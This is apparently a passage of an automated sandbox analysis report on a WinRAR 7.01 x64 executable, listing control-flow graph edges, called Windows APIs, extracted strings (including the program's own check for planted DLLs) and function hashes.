1517->1523 1524 7ff6c3ba62f3-7ff6c3ba62f9 1517->1524 1520 7ff6c3ba61b5-7ff6c3ba61c3 call 7ff6c3ba9a60 1518->1520 1521 7ff6c3ba5ee9-7ff6c3ba5f1b 1518->1521 1519->1514 1519->1518 1546 7ff6c3ba62d2 1520->1546 1547 7ff6c3ba61c9-7ff6c3ba61f6 call 7ff6c3ba9acc call 7ff6c3ba777c 1520->1547 1525 7ff6c3ba5f20-7ff6c3ba5f44 call 7ff6c3bc0438 call 7ff6c3bc4b6c 1521->1525 1526 7ff6c3ba638b-7ff6c3ba63ad call 7ff6c3ba63bc 1523->1526 1527 7ff6c3ba636c-7ff6c3ba636f 1523->1527 1529 7ff6c3ba62ff-7ff6c3ba630b 1524->1529 1530 7ff6c3ba6082-7ff6c3ba6085 1524->1530 1559 7ff6c3ba5f46-7ff6c3ba5f54 1525->1559 1560 7ff6c3ba5f5d-7ff6c3ba5f68 1525->1560 1555 7ff6c3ba63b5-7ff6c3ba63bb call 7ff6c3bb9564 1526->1555 1527->1526 1533 7ff6c3ba6371-7ff6c3ba6377 1527->1533 1561 7ff6c3ba6107-7ff6c3ba616b call 7ff6c3b91adc call 7ff6c3ba6e54 call 7ff6c3b91adc call 7ff6c3bc4bb0 call 7ff6c3ba6e54 call 7ff6c3b91adc call 7ff6c3bc4bb0 1528->1561 1562 7ff6c3ba60c7-7ff6c3ba6105 call 7ff6c3ba6e60 * 2 call 7ff6c3ba6e08 1528->1562 1536 7ff6c3ba634a-7ff6c3ba634c 1529->1536 1537 7ff6c3ba630d-7ff6c3ba6311 1529->1537 1530->1510 1530->1511 1533->1530 1541 7ff6c3ba637d-7ff6c3ba6386 1533->1541 1540 7ff6c3ba6351-7ff6c3ba635b 1536->1540 1544 7ff6c3ba6313-7ff6c3ba6317 1537->1544 1545 7ff6c3ba6338-7ff6c3ba633f 1537->1545 1540->1530 1541->1530 1550 7ff6c3ba6341-7ff6c3ba6348 1544->1550 1551 7ff6c3ba6319-7ff6c3ba631d 1544->1551 1545->1540 1546->1514 1547->1546 1572 7ff6c3ba61fc-7ff6c3ba628c call 7ff6c3bac520 call 7ff6c3ba9aa8 call 7ff6c3ba9af8 call 7ff6c3ba9aa8 call 7ff6c3ba6e54 call 7ff6c3b91adc call 7ff6c3bc5058 1547->1572 1550->1540 1556 7ff6c3ba631f-7ff6c3ba6323 1551->1556 1557 7ff6c3ba6332 1551->1557 1556->1541 1564 7ff6c3ba6325-7ff6c3ba6330 1556->1564 1557->1545 1559->1560 1568 7ff6c3ba5f56-7ff6c3ba5f59 1559->1568 1560->1525 1569 7ff6c3ba5f6a-7ff6c3ba5f7a 1560->1569 1561->1429 1562->1561 1564->1540 1568->1560 1574 7ff6c3ba5f9d 1569->1574 1575 7ff6c3ba5f7c-7ff6c3ba5f8e call 7ff6c3ba9aa8 1569->1575 1629 7ff6c3ba628e-7ff6c3ba629f 1572->1629 1630 7ff6c3ba62a4-7ff6c3ba62b4 1572->1630 1580 7ff6c3ba61b0 1574->1580 1581 7ff6c3ba5fa3 1574->1581 1585 7ff6c3ba5f93-7ff6c3ba5f98 1575->1585 1580->1520 1586 7ff6c3ba5fa9-7ff6c3ba5fb5 1581->1586 1585->1530 1588 7ff6c3ba5fb7-7ff6c3ba5fbb 1586->1588 1589 7ff6c3ba5fbd-7ff6c3ba5fc0 1586->1589 1588->1589 1593 7ff6c3ba5fc2-7ff6c3ba5fcb 1588->1593 1589->1586 1597 7ff6c3ba5ff4-7ff6c3ba5ffe 1593->1597 1598 7ff6c3ba5fcd-7ff6c3ba5fd7 1593->1598 1597->1555 1602 7ff6c3ba6004-7ff6c3ba6029 call 7ff6c3bac520 1597->1602 1601 7ff6c3ba5fda-7ff6c3ba5fde 1598->1601 1601->1597 1605 7ff6c3ba5fe0-7ff6c3ba5ff2 1601->1605 1612 7ff6c3ba604f-7ff6c3ba607a call 7ff6c3ba77f4 1602->1612 1613 7ff6c3ba602b-7ff6c3ba604a call 7ff6c3bc4b34 1602->1613 1605->1597 1605->1601 1624 7ff6c3ba607f 1612->1624 1613->1585 1624->1530 1629->1630 1631 7ff6c3ba62b7-7ff6c3ba62bc 1630->1631 1632 7ff6c3ba62be-7ff6c3ba62c7 1631->1632 1633 7ff6c3ba62cd-7ff6c3ba62d0 1631->1633 1632->1624 1632->1633 1633->1631
                                                            APIs
                                                              • Part of subcall function 00007FF6C3BAC574: MultiByteToWideChar.KERNEL32(?,?,?,?,0000002A,00007FF6C3BAC61A), ref: 00007FF6C3BAC5A1
                                                            • __swprintf_l.LIBCMT ref: 00007FF6C3BA6075
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__swprintf_l
                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                            • API String ID: 3405735246-2291855099
                                                            • Opcode ID: 4c8cdaf5374277e586a6af8197ceb8720bacdc96012a2ce04d4906171d4e573e
                                                            • Instruction ID: 5b58f6e71228791663f8c45ccc92c15933a47534a4344f78d739fb9fd58dbc12
                                                            • Opcode Fuzzy Hash: 4c8cdaf5374277e586a6af8197ceb8720bacdc96012a2ce04d4906171d4e573e
                                                            • Instruction Fuzzy Hash: 3022A261A18E4395EA20DF24D442AF963A0FF72749F800136EADDA76D5EF3DE605C740

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ItemText$ByteCharClientMetricsMultiSystemWide
                                                            • String ID: $%s:$CAPTION
                                                            • API String ID: 612398153-404845831
                                                            • Opcode ID: ee7c6a2717057d0bed3ba9a49207a42e0b11ab8094b40c8b8e3542f0488fcae4
                                                            • Instruction ID: 3ce072583e8c60f120a1b4fec3037b229a17768fb81c61386d685d534e8794e2
                                                            • Opcode Fuzzy Hash: ee7c6a2717057d0bed3ba9a49207a42e0b11ab8094b40c8b8e3542f0488fcae4
                                                            • Instruction Fuzzy Hash: A0912B76B286428BD718CF39E802A697760FB99785F405135EECDA7B58CE3DE905CB00

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                            • String ID: PNG
                                                            • API String ID: 4097654274-364855578
                                                            • Opcode ID: 6e6bf86b030be450644aadc403cb9e14e21563b103a4267463e7844ec5b29060
                                                            • Instruction ID: 611ad7ee9d5542bbbecb35da6aaa3a68ca252f023049ea3084753b87a42152c1
                                                            • Opcode Fuzzy Hash: 6e6bf86b030be450644aadc403cb9e14e21563b103a4267463e7844ec5b29060
                                                            • Instruction Fuzzy Hash: 2C316310B09F0241FE049F56E896A79A3A1AFAABD6F044035DDCDEB7A4DE7CE444C700
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CMT
                                                            • API String ID: 0-2756464174
                                                            • Opcode ID: 351ff16d4104adea7f1074458176bd78b00927301f114295ad6265ad447cbcbf
                                                            • Instruction ID: 8e0439a4030347a7a0f4f2db96d1b8940530741da20ff19936317e7caca867f6
                                                            • Opcode Fuzzy Hash: 351ff16d4104adea7f1074458176bd78b00927301f114295ad6265ad447cbcbf
                                                            • Instruction Fuzzy Hash: A342B162B0878296EA04DF60D642AFD67B1FB72385F400036EACEE7696DF38E555C700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID:
                                                            • API String ID: 1378638983-0
                                                            • Opcode ID: 6db9b2efe3c25178f9d477f987fa70b0f48e55e0aa98e6770473b5fbfdc9b696
                                                            • Instruction ID: d7418216e740c03f0c1da7ba7966fb1380131d583e09b66a3439d85e02753eb9
                                                            • Opcode Fuzzy Hash: 6db9b2efe3c25178f9d477f987fa70b0f48e55e0aa98e6770473b5fbfdc9b696
                                                            • Instruction Fuzzy Hash: 8BF0C237B18B90C1D6049F03A980499BB64F79AFC0B189031DFC967715CE38E551C740

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff6c3baa548-7ff6c3baa59e call 7ff6c3bb9f40 GetModuleHandleW 3 7ff6c3baa5a0-7ff6c3baa5b3 GetProcAddress 0->3 4 7ff6c3baa5e5-7ff6c3baa918 0->4 7 7ff6c3baa5b5 3->7 8 7ff6c3baa5c2-7ff6c3baa5d5 GetProcAddress 3->8 5 7ff6c3baa91e-7ff6c3baa92e call 7ff6c3bc56d0 4->5 6 7ff6c3baaa48-7ff6c3baaa66 call 7ff6c3ba4964 call 7ff6c3ba3400 4->6 5->6 16 7ff6c3baa934-7ff6c3baa975 call 7ff6c3ba4964 call 7ff6c3b9128c CreateFileW 5->16 19 7ff6c3baaa6a-7ff6c3baaa74 call 7ff6c3ba2a74 6->19 7->8 8->4 9 7ff6c3baa5d7-7ff6c3baa5e2 8->9 9->4 27 7ff6c3baaa35-7ff6c3baaa43 CloseHandle call 7ff6c3b92254 16->27 28 7ff6c3baa97b-7ff6c3baa98e SetFilePointer 16->28 25 7ff6c3baaaa9-7ff6c3baaad7 call 7ff6c3b920b4 call 7ff6c3ba36b8 call 7ff6c3b92254 call 7ff6c3ba160c 19->25 26 7ff6c3baaa76-7ff6c3baaa81 call 7ff6c3baad40 19->26 56 7ff6c3baaadc-7ff6c3baaadf 25->56 26->25 39 7ff6c3baaa83-7ff6c3baaaa7 CompareStringW 26->39 27->6 28->27 31 7ff6c3baa994-7ff6c3baa9b6 ReadFile 28->31 31->27 35 7ff6c3baa9b8-7ff6c3baa9c6 31->35 36 7ff6c3baad37-7ff6c3baad3f call 7ff6c3bb9564 35->36 37 7ff6c3baa9cc-7ff6c3baa9f6 call 7ff6c3b920b4 call 7ff6c3b926bc 35->37 55 7ff6c3baaa0a-7ff6c3baaa1f call 7ff6c3ba9c24 37->55 39->25 43 7ff6c3baaae8-7ff6c3baaaf1 39->43 43->19 47 7ff6c3baaaf7 43->47 50 7ff6c3baaafc-7ff6c3baaaff 47->50 53 7ff6c3baab50-7ff6c3baab53 50->53 54 7ff6c3baab01-7ff6c3baab04 50->54 57 7ff6c3baacf4-7ff6c3baad36 call 7ff6c3b92254 * 2 call 7ff6c3bb92f0 53->57 58 7ff6c3baab59-7ff6c3baab6c call 7ff6c3ba3970 call 7ff6c3ba2a74 53->58 59 7ff6c3baab08-7ff6c3baab3e call 7ff6c3b920b4 call 7ff6c3ba36b8 call 7ff6c3b92254 call 7ff6c3ba160c 54->59 71 7ff6c3baaa21-7ff6c3baaa30 call 7ff6c3b92254 * 2 55->71 72 7ff6c3baa9f8-7ff6c3baaa05 call 7ff6c3b9128c call 7ff6c3baad40 55->72 60 7ff6c3baaae1 56->60 61 7ff6c3baaaf9 56->61 84 7ff6c3baab72-7ff6c3baac34 call 7ff6c3baad40 * 2 call 7ff6c3ba788c call 7ff6c3ba9f58 call 7ff6c3ba788c call 7ff6c3b920b4 call 7ff6c3bb1fac call 7ff6c3b92254 58->84 85 7ff6c3baac39-7ff6c3baac82 call 7ff6c3ba9f58 AllocConsole 58->85 101 7ff6c3baab40-7ff6c3baab49 59->101 102 7ff6c3baab4d 59->102 60->43 61->50 71->27 72->55 103 7ff6c3baace6-7ff6c3baaced call 7ff6c3b92254 ExitProcess 84->103 96 7ff6c3baace1 85->96 97 7ff6c3baac84-7ff6c3baacdb GetCurrentProcessId AttachConsole call 7ff6c3b91ae4 call 7ff6c3b9128c GetStdHandle WriteConsoleW Sleep FreeConsole 85->97 96->103 97->96 101->59 106 7ff6c3baab4b 101->106 102->53 106->53
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$xlistpos
                                                            • API String ID: 1466332177-2059703551
                                                            • Opcode ID: 4f4d2e665c102e2b0202718de5bc8b4036e7805afb087b8b46c1cccf70c400bf
                                                            • Instruction ID: 86bb80539204c66cfc381ff30a15bfaa4276ee310ecd0ef0de4b7d3399d1787d
                                                            • Opcode Fuzzy Hash: 4f4d2e665c102e2b0202718de5bc8b4036e7805afb087b8b46c1cccf70c400bf
                                                            • Instruction Fuzzy Hash: 50322E31A09F8299EB119F64E8429E973B4FF66315F504236DACCA6769EF3CD249C340

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1354 7ff6c3bb8b00-7ff6c3bb8b89 call 7ff6c3bb8754 1357 7ff6c3bb8bb4-7ff6c3bb8bd1 1354->1357 1358 7ff6c3bb8b8b-7ff6c3bb8baf call 7ff6c3bb8a64 RaiseException 1354->1358 1359 7ff6c3bb8bd3-7ff6c3bb8be4 1357->1359 1360 7ff6c3bb8be6-7ff6c3bb8bea 1357->1360 1364 7ff6c3bb8db8-7ff6c3bb8dd5 1358->1364 1362 7ff6c3bb8bed-7ff6c3bb8bf9 1359->1362 1360->1362 1365 7ff6c3bb8bfb-7ff6c3bb8c0d 1362->1365 1366 7ff6c3bb8c1a-7ff6c3bb8c1d 1362->1366 1374 7ff6c3bb8c13 1365->1374 1375 7ff6c3bb8d89-7ff6c3bb8d93 1365->1375 1367 7ff6c3bb8cc4-7ff6c3bb8ccb 1366->1367 1368 7ff6c3bb8c23-7ff6c3bb8c26 1366->1368 1370 7ff6c3bb8cdf-7ff6c3bb8ce2 1367->1370 1371 7ff6c3bb8ccd-7ff6c3bb8cdc 1367->1371 1372 7ff6c3bb8c28-7ff6c3bb8c3b 1368->1372 1373 7ff6c3bb8c3d-7ff6c3bb8c52 LoadLibraryExA 1368->1373 1376 7ff6c3bb8d85 1370->1376 1377 7ff6c3bb8ce8-7ff6c3bb8cec 1370->1377 1371->1370 1372->1373 1379 7ff6c3bb8ca9-7ff6c3bb8cb2 1372->1379 1378 7ff6c3bb8c54-7ff6c3bb8c67 GetLastError 1373->1378 1373->1379 1374->1366 1386 7ff6c3bb8db0 call 7ff6c3bb8a64 1375->1386 1387 7ff6c3bb8d95-7ff6c3bb8da6 1375->1387 1376->1375 1384 7ff6c3bb8cee-7ff6c3bb8cf2 1377->1384 1385 7ff6c3bb8d1b-7ff6c3bb8d2e GetProcAddress 1377->1385 1388 7ff6c3bb8c7e-7ff6c3bb8ca4 call 7ff6c3bb8a64 RaiseException 1378->1388 1389 7ff6c3bb8c69-7ff6c3bb8c7c 1378->1389 1380 7ff6c3bb8cb4-7ff6c3bb8cb7 FreeLibrary 1379->1380 1381 7ff6c3bb8cbd 1379->1381 1380->1381 1381->1367 1384->1385 1393 7ff6c3bb8cf4-7ff6c3bb8cff 1384->1393 1385->1376 1392 7ff6c3bb8d30-7ff6c3bb8d43 GetLastError 1385->1392 1396 7ff6c3bb8db5 1386->1396 1387->1386 1388->1364 1389->1379 1389->1388 1398 7ff6c3bb8d45-7ff6c3bb8d58 1392->1398 1399 7ff6c3bb8d5a-7ff6c3bb8d81 call 7ff6c3bb8a64 RaiseException call 7ff6c3bb8754 1392->1399 1393->1385 1394 7ff6c3bb8d01-7ff6c3bb8d08 1393->1394 1394->1385 1400 7ff6c3bb8d0a-7ff6c3bb8d0f 1394->1400 1396->1364 1398->1376 1398->1399 1399->1376 1400->1385 1402 7ff6c3bb8d11-7ff6c3bb8d19 1400->1402 1402->1376 1402->1385
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                            • String ID: H
                                                            • API String ID: 3432403771-2852464175
                                                            • Opcode ID: 08df8d98a9dad4dac36af99e044c8b654dd9a4f13edfbee5db96de11301e47a4
                                                            • Instruction ID: 6e62dcc1656ba83ad6f7c6bac44f0144c273b530e8dc5f1f46f03bcc2d3ff8fa
                                                            • Opcode Fuzzy Hash: 08df8d98a9dad4dac36af99e044c8b654dd9a4f13edfbee5db96de11301e47a4
                                                            • Instruction Fuzzy Hash: 90915032A05B5186EB40CF65D881AAC73A1FB29B9AF05453ADECDAB758DF38E445C300

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Parent$ClassCreateCursorLoadPointsRectRegisterUpdate
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 1583632621-1658105358
                                                            • Opcode ID: 2b70092a86cac6ffc10dd9a14848574c8ad0378229ad06ef114b750902a6c3d4
                                                            • Instruction ID: 42e64d33230ecaa6fe370fe38f5143ecb7877293e4613d310989c9d32ae450cd
                                                            • Opcode Fuzzy Hash: 2b70092a86cac6ffc10dd9a14848574c8ad0378229ad06ef114b750902a6c3d4
                                                            • Instruction Fuzzy Hash: A641B276B08B4186EB18CF19E496B7973A1EBAAB96F054035DDCD97754CF3CE0458B00

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1730 7ff6c3bcb170-7ff6c3bcb1c2 1731 7ff6c3bcb2b3 1730->1731 1732 7ff6c3bcb1c8-7ff6c3bcb1cb 1730->1732 1735 7ff6c3bcb2b5-7ff6c3bcb2d1 1731->1735 1733 7ff6c3bcb1d5-7ff6c3bcb1d8 1732->1733 1734 7ff6c3bcb1cd-7ff6c3bcb1d0 1732->1734 1736 7ff6c3bcb1de-7ff6c3bcb1ed 1733->1736 1737 7ff6c3bcb298-7ff6c3bcb2ab 1733->1737 1734->1735 1738 7ff6c3bcb1ef-7ff6c3bcb1f2 1736->1738 1739 7ff6c3bcb1fd-7ff6c3bcb21c LoadLibraryW 1736->1739 1737->1731 1742 7ff6c3bcb2f2-7ff6c3bcb301 GetProcAddress 1738->1742 1743 7ff6c3bcb1f8 1738->1743 1740 7ff6c3bcb2d2-7ff6c3bcb2e7 1739->1740 1741 7ff6c3bcb222-7ff6c3bcb22b GetLastError 1739->1741 1740->1742 1744 7ff6c3bcb2e9-7ff6c3bcb2ec FreeLibrary 1740->1744 1746 7ff6c3bcb272-7ff6c3bcb27c 1741->1746 1747 7ff6c3bcb22d-7ff6c3bcb244 call 7ff6c3bc4b6c 1741->1747 1748 7ff6c3bcb303-7ff6c3bcb32a 1742->1748 1749 7ff6c3bcb291 1742->1749 1745 7ff6c3bcb284-7ff6c3bcb28b 1743->1745 1744->1742 1745->1736 1745->1749 1746->1745 1747->1746 1752 7ff6c3bcb246-7ff6c3bcb25a call 7ff6c3bc4b6c 1747->1752 1748->1735 1749->1737 1752->1746 1755 7ff6c3bcb25c-7ff6c3bcb270 LoadLibraryExW 1752->1755 1755->1740 1755->1746
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: 57a8b596a1503f26f6ff46af51ce6bc8fd40067f29b5d6761e983004135d4d5f
                                                            • Instruction ID: a83f741af24929793694f46139cc21d39025b2988dfbe1235ce7b62bfe5ff90f
                                                            • Opcode Fuzzy Hash: 57a8b596a1503f26f6ff46af51ce6bc8fd40067f29b5d6761e983004135d4d5f
                                                            • Instruction Fuzzy Hash: 76410421B19A1282EA25DF16A8069BD2791BF67BE2F084135DDCDEB788DF3CE445C344

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
